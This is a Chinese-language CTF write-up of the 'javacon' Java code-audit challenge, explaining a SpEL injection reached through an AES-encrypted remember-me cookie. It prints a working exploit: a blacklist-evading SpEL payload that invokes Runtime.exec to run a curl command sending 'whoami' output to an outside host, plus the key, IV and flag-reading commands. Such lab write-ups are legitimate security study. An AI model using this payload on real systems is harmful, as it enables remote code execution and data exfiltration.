[Java代码审计]javacon WriteUp

文章目录

• ​​写在前面​​
• ​​javacon​​

写在前面

在P神星球看到的，这里学习一下，文件在​​https://www.leavesongs.com/media/attachment/2018/11/23/challenge-0.0.1-SNAPSHOT.jar​​

javacon

运行的时候利用​​java -jar challenge-0.0.1-SNAPSHOT.jar​​ 首先查看配置

首先在登录页面，在login页面post接收参数，与配置当中的比对，成功则设置cookie

@PostMapping({"/login"})
    public String login(@RequestParam(value = "username",required = true) String username, @RequestParam(value = "password",required = true) String password, @RequestParam(value = "remember-me",required = false) String isRemember, HttpSession session, HttpServletResponse response) {
        if (this.userConfig.getUsername().contentEquals(username) && this.userConfig.getPassword().contentEquals(password)) {
            session.setAttribute("username", username);
            if (isRemember != null && !isRemember.equals("")) {
                Cookie c = new Cookie("remember-me", this.userConfig.encryptRememberMe());
                c.setMaxAge(2592000);
                response.addCookie(c);
            }

            return "redirect:/";
        } else {
            return "redirect:/login-error";
        }
    }

选中RememberMe之后登录，成功进入

我们看看这里进行的操作，首先获取remember-me参数

查看函数​​getAdvanceValue​​

首先这里将接收的参数并与黑名单进行比对，如果匹配成功则抛出错误

如果没有匹配到则进行正常流程，在SmallEvaluationContext进行SpEL表达式解析。注意，这里就存在SPEl表达式注入

因此我们只需要绕过黑名单构造参数即可

class Encryptor {
    static Logger logger = LoggerFactory.getLogger(Encryptor.class);

    public Encryptor() {
    }

    public static String encrypt(String key, String initVector, String value) {
        try {
            IvParameterSpec iv = new IvParameterSpec(initVector.getBytes("UTF-8"));
            SecretKeySpec skeySpec = new SecretKeySpec(key.getBytes("UTF-8"), "AES");
            Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5PADDING");
            cipher.init(1, skeySpec, iv);
            byte[] encrypted = cipher.doFinal(value.getBytes());
            return Base64.getUrlEncoder().encodeToString(encrypted);
        } catch (Exception var7) {
            logger.warn(var7.getMessage());
            return null;
        }
    }

    public static String decrypt(String key, String initVector, String encrypted) {
        try {
            IvParameterSpec iv = new IvParameterSpec(initVector.getBytes("UTF-8"));
            SecretKeySpec skeySpec = new SecretKeySpec(key.getBytes("UTF-8"), "AES");
            Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5PADDING");
            cipher.init(2, skeySpec, iv);
            byte[] original = cipher.doFinal(Base64.getUrlDecoder().decode(encrypted));
            return new String(original);
        } catch (Exception var7) {
            logger.warn(var7.getMessage());
            return null;
        }
    }
}

public class RMIServer {
    public static void main(String[] args) throws IOException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, IllegalAccessException, InstantiationException {
        System.out.println(Encryptor.encrypt("c0dehack1nghere1", "0123456789abcdef", "#{T(String).getClass().forName(\"java.l\"+\"ang.Ru\"+\"ntime\").getMethod(\"ex\"+\"ec\",T(String[])).invoke(T(String).getClass().forName(\"java.l\"+\"ang.Ru\"+\"ntime\").getMethod(\"getRu\"+\"ntime\").invoke(T(String).getClass().forName(\"java.l\"+\"ang.Ru\"+\"ntime\")),new String[]{\"/bin/bash\",\"-c\",\"curl http://xxx?a=`whoami`\"})}"));
    }
}

成功拿到

看看根目录使用​​ls /|base64​​防止遇到空格以后被截断

通过​​cat /flag​​获取到flag